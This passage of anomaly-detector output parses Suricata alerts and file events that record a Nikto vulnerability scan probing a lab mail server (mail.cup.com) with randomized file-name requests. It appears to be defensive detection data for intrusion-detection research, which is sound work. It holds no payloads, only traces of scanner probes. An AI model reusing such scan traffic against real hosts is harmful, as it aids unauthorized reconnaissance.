"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46854,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46854, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2006664539188459,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2006664539188459, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.242016+0000\",\"flow_id\":2006664539188459,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46854,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": 
[ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.243409 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46856 -> 192.168.10.154:80", "/parser/model/time": 1583349514.243409, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46856, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.243409 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46856 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": 
"NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.htaccess~", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.243594+0000\",\"flow_id\":1380698825602070,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46856,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htaccess~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htaccess~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.243594, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1380698825602070,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46856,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htaccess~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htaccess~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46856,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htaccess~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htaccess~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.htaccess~\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.htaccess~\",", 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.htaccess~", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.htaccess~", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", 
"/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46856,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46856, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1380698825602070,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1380698825602070, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.243594+0000\",\"flow_id\":1380698825602070,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46856,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htaccess~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htaccess~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.244892 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46858 -> 192.168.10.154:80", "/parser/model/time": 1583349514.244892, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", 
"/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46858, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.244892 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46858 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.iso-ru", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.245043+0000\",\"flow_id\":1686874159233612,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46858,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso-ru\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso-ru\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.245043, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, 
"/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1686874159233612,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46858,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso-ru\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso-ru\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46858,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso-ru\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso-ru\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.iso-ru\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.iso-ru\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.iso-ru", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.iso-ru", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", 
"/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46858,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46858, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1686874159233612,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 1686874159233612, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.245043+0000\",\"flow_id\":1686874159233612,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46858,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso-ru\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso-ru\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.246745 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46860 -> 192.168.10.154:80", "/parser/model/time": 1583349514.246745, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: 
", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46860, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.246745 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46860 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.nl", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.246933+0000\",\"flow_id\":1913111561551927,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46860,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
"/parser/model/time": 1583349514.246933, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1913111561551927,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46860,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46860,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.nl\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": 
"CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.nl\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.nl", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", 